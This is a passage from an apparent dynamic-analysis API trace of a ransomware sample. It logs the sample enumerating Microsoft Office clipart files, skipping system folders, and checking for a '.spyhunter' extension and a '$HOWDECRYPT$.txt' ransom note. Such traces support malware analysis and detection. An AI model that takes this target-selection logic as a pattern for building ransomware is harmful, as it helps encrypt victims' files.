Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 67 [0097.195] StrStrIW (lpFirst="DD00297_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.195] lstrcmpW (lpString1="DD00297_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.195] lstrcmpW (lpString1="DD00297_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.195] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 67 [0097.195] GetProcessHeap () returned 0x2c0000 [0097.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1db80 [0097.195] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a80) returned 0x2c310e0 [0097.195] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.195] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="Windows") returned -1 [0097.195] lstrlenW (lpString="Windows") returned 7 [0097.195] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="$Recycle.bin") returned 1 [0097.195] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.195] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="System Volume Information") returned -1 [0097.195] lstrlenW (lpString="System Volume Information") returned 25 [0097.195] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 67 [0097.195] StrStrIW (lpFirst="DD00372_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.195] lstrcmpW (lpString1="DD00372_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.195] lstrcmpW (lpString1="DD00372_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.195] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 67 [0097.195] GetProcessHeap () returned 0x2c0000 [0097.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1dc50 [0097.196] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a88) returned 0x2c310e0 [0097.196] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.196] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="Windows") returned -1 [0097.196] lstrlenW (lpString="Windows") returned 7 [0097.196] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="$Recycle.bin") returned 1 [0097.196] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.196] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="System Volume Information") returned -1 [0097.196] lstrlenW (lpString="System Volume Information") returned 25 [0097.196] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 67 [0097.196] StrStrIW (lpFirst="DD00405_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.196] lstrcmpW (lpString1="DD00405_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.196] lstrcmpW (lpString1="DD00405_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.196] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 67 [0097.196] GetProcessHeap () returned 0x2c0000 [0097.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1dd20 [0097.196] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a90) returned 0x2c310e0 [0097.196] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.196] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="Windows") returned -1 [0097.196] lstrlenW (lpString="Windows") returned 7 [0097.196] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="$Recycle.bin") returned 1 [0097.196] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.196] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="System Volume Information") returned -1 [0097.196] lstrlenW (lpString="System Volume Information") returned 25 [0097.196] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 67 [0097.196] StrStrIW (lpFirst="DD00407_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.196] lstrcmpW (lpString1="DD00407_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.196] lstrcmpW (lpString1="DD00407_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 67 [0097.197] GetProcessHeap () returned 0x2c0000 [0097.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ddf0 [0097.197] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a98) returned 0x2c310e0 [0097.197] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.197] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="Windows") returned -1 [0097.197] lstrlenW (lpString="Windows") returned 7 [0097.197] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="$Recycle.bin") returned 1 [0097.197] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.197] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="System Volume Information") returned -1 [0097.197] lstrlenW (lpString="System Volume Information") returned 25 [0097.197] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 67 [0097.197] StrStrIW (lpFirst="DD00413_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.197] lstrcmpW (lpString1="DD00413_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.197] lstrcmpW (lpString1="DD00413_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 67 [0097.197] GetProcessHeap () returned 0x2c0000 [0097.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1dec0 [0097.197] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1aa0) returned 0x2c310e0 [0097.197] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.197] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="Windows") returned -1 [0097.197] lstrlenW (lpString="Windows") returned 7 [0097.197] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="$Recycle.bin") returned 1 [0097.197] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.197] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="System Volume Information") returned -1 [0097.197] lstrlenW (lpString="System Volume Information") returned 25 [0097.198] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 67 [0097.198] StrStrIW (lpFirst="DD00414_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.198] lstrcmpW (lpString1="DD00414_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.198] lstrcmpW (lpString1="DD00414_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 67 [0097.198] GetProcessHeap () returned 0x2c0000 [0097.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1df90 [0097.198] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1aa8) returned 0x2c310e0 [0097.198] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.198] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="Windows") returned -1 [0097.198] lstrlenW (lpString="Windows") returned 7 [0097.198] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="$Recycle.bin") returned 1 [0097.198] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.198] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="System Volume Information") returned -1 [0097.198] lstrlenW (lpString="System Volume Information") returned 25 [0097.198] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 67 [0097.198] StrStrIW (lpFirst="DD00419_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.198] lstrcmpW (lpString1="DD00419_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.198] lstrcmpW (lpString1="DD00419_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 67 [0097.198] GetProcessHeap () returned 0x2c0000 [0097.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e060 [0097.198] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ab0) returned 0x2c310e0 [0097.198] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.198] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="Windows") returned -1 [0097.199] lstrlenW (lpString="Windows") returned 7 [0097.199] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="$Recycle.bin") returned 1 [0097.199] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.199] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="System Volume Information") returned -1 [0097.199] lstrlenW (lpString="System Volume Information") returned 25 [0097.199] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 67 [0097.199] StrStrIW (lpFirst="DD00437_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.199] lstrcmpW (lpString1="DD00437_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.199] lstrcmpW (lpString1="DD00437_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.199] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 67 [0097.199] GetProcessHeap () returned 0x2c0000 [0097.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b0b0 [0097.199] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ab8) returned 0x2c310e0 [0097.199] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.199] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="Windows") returned -1 [0097.199] lstrlenW (lpString="Windows") returned 7 [0097.199] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="$Recycle.bin") returned 1 [0097.199] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.199] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="System Volume Information") returned -1 [0097.199] lstrlenW (lpString="System Volume Information") returned 25 [0097.199] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 67 [0097.199] StrStrIW (lpFirst="DD00448_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.199] lstrcmpW (lpString1="DD00448_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.199] lstrcmpW (lpString1="DD00448_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.199] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 67 [0097.199] GetProcessHeap () returned 0x2c0000 [0097.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e1c8 [0097.200] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ac0) returned 0x2c310e0 [0097.200] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.200] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="Windows") returned -1 [0097.200] lstrlenW (lpString="Windows") returned 7 [0097.200] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="$Recycle.bin") returned 1 [0097.200] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.200] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="System Volume Information") returned -1 [0097.200] lstrlenW (lpString="System Volume Information") returned 25 [0097.200] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 67 [0097.200] StrStrIW (lpFirst="DD00449_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.200] lstrcmpW (lpString1="DD00449_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.200] lstrcmpW (lpString1="DD00449_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.200] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 67 [0097.200] GetProcessHeap () returned 0x2c0000 [0097.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e298 [0097.200] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ac8) returned 0x2c310e0 [0097.200] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.200] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="Windows") returned -1 [0097.200] lstrlenW (lpString="Windows") returned 7 [0097.200] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="$Recycle.bin") returned 1 [0097.200] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.200] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="System Volume Information") returned -1 [0097.200] lstrlenW (lpString="System Volume Information") returned 25 [0097.200] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 67 [0097.200] StrStrIW (lpFirst="DD00687_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.201] lstrcmpW (lpString1="DD00687_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.201] lstrcmpW (lpString1="DD00687_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.201] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 67 [0097.201] GetProcessHeap () returned 0x2c0000 [0097.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e368 [0097.201] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ad0) returned 0x2c310e0 [0097.201] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.201] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="Windows") returned -1 [0097.201] lstrlenW (lpString="Windows") returned 7 [0097.201] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="$Recycle.bin") returned 1 [0097.201] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.201] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="System Volume Information") returned -1 [0097.201] lstrlenW (lpString="System Volume Information") returned 25 [0097.201] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 67 [0097.201] StrStrIW (lpFirst="DD00705_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.201] lstrcmpW (lpString1="DD00705_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.201] lstrcmpW (lpString1="DD00705_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.201] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 67 [0097.201] GetProcessHeap () returned 0x2c0000 [0097.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e438 [0097.201] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ad8) returned 0x2c310e0 [0097.201] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.201] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="Windows") returned -1 [0097.201] lstrlenW (lpString="Windows") returned 7 [0097.201] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="$Recycle.bin") returned 1 [0097.202] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.202] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="System Volume Information") returned -1 [0097.202] lstrlenW (lpString="System Volume Information") returned 25 [0097.202] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 67 [0097.202] StrStrIW (lpFirst="DD01015_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.202] lstrcmpW (lpString1="DD01015_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.202] lstrcmpW (lpString1="DD01015_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.202] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 67 [0097.202] GetProcessHeap () returned 0x2c0000 [0097.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e508 [0097.202] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ae0) returned 0x2c310e0 [0097.202] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.202] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="Windows") returned -1 [0097.202] lstrlenW (lpString="Windows") returned 7 [0097.202] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="$Recycle.bin") returned 1 [0097.202] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.202] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="System Volume Information") returned -1 [0097.202] lstrlenW (lpString="System Volume Information") returned 25 [0097.202] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 67 [0097.202] StrStrIW (lpFirst="DD01039_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.202] lstrcmpW (lpString1="DD01039_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.202] lstrcmpW (lpString1="DD01039_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.202] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 67 [0097.202] GetProcessHeap () returned 0x2c0000 [0097.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e5d8 [0097.202] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ae8) returned 0x2c310e0 [0097.202] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.203] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="Windows") returned -1 [0097.203] lstrlenW (lpString="Windows") returned 7 [0097.203] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="$Recycle.bin") returned 1 [0097.204] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.204] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="System Volume Information") returned -1 [0097.204] lstrlenW (lpString="System Volume Information") returned 25 [0097.204] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 67 [0097.204] StrStrIW (lpFirst="DD01138_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.204] lstrcmpW (lpString1="DD01138_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.204] lstrcmpW (lpString1="DD01138_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.204] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 67 [0097.204] GetProcessHeap () returned 0x2c0000 [0097.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e6a8 [0097.204] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1af0) returned 0x2c310e0 [0097.204] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.204] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="Windows") returned -1 [0097.204] lstrlenW (lpString="Windows") returned 7 [0097.204] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="$Recycle.bin") returned 1 [0097.204] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.204] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="System Volume Information") returned -1 [0097.204] lstrlenW (lpString="System Volume Information") returned 25 [0097.204] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 67 [0097.204] StrStrIW (lpFirst="DD01139_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.204] lstrcmpW (lpString1="DD01139_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.204] lstrcmpW (lpString1="DD01139_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.204] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 67 [0097.204] GetProcessHeap () returned 0x2c0000 [0097.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e778 [0097.204] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1af8) returned 0x2c310e0 [0097.205] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.205] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="Windows") returned -1 [0097.205] lstrlenW (lpString="Windows") returned 7 [0097.205] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="$Recycle.bin") returned 1 [0097.205] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.205] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="System Volume Information") returned -1 [0097.205] lstrlenW (lpString="System Volume Information") returned 25 [0097.205] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 67 [0097.205] StrStrIW (lpFirst="DD01140_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.205] lstrcmpW (lpString1="DD01140_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.205] lstrcmpW (lpString1="DD01140_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 67 [0097.205] GetProcessHeap () returned 0x2c0000 [0097.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e848 [0097.205] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b00) returned 0x2c310e0 [0097.205] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.205] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="Windows") returned -1 [0097.205] lstrlenW (lpString="Windows") returned 7 [0097.205] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="$Recycle.bin") returned 1 [0097.205] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.205] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="System Volume Information") returned -1 [0097.205] lstrlenW (lpString="System Volume Information") returned 25 [0097.205] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 67 [0097.205] StrStrIW (lpFirst="DD01143_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.205] lstrcmpW (lpString1="DD01143_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.205] lstrcmpW (lpString1="DD01143_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 67 [0097.205] GetProcessHeap () returned 0x2c0000 [0097.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e918 [0097.206] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b08) returned 0x2c310e0 [0097.206] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.206] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="Windows") returned -1 [0097.206] lstrlenW (lpString="Windows") returned 7 [0097.206] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="$Recycle.bin") returned 1 [0097.206] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.206] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="System Volume Information") returned -1 [0097.206] lstrlenW (lpString="System Volume Information") returned 25 [0097.206] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 67 [0097.206] StrStrIW (lpFirst="DD01145_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.206] lstrcmpW (lpString1="DD01145_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.206] lstrcmpW (lpString1="DD01145_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 67 [0097.206] GetProcessHeap () returned 0x2c0000 [0097.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2e9e8 [0097.206] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b10) returned 0x2c310e0 [0097.206] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.206] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="Windows") returned -1 [0097.206] lstrlenW (lpString="Windows") returned 7 [0097.206] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="$Recycle.bin") returned 1 [0097.206] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.206] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="System Volume Information") returned -1 [0097.206] lstrlenW (lpString="System Volume Information") returned 25 [0097.206] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 67 [0097.206] StrStrIW (lpFirst="DD01146_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.206] lstrcmpW 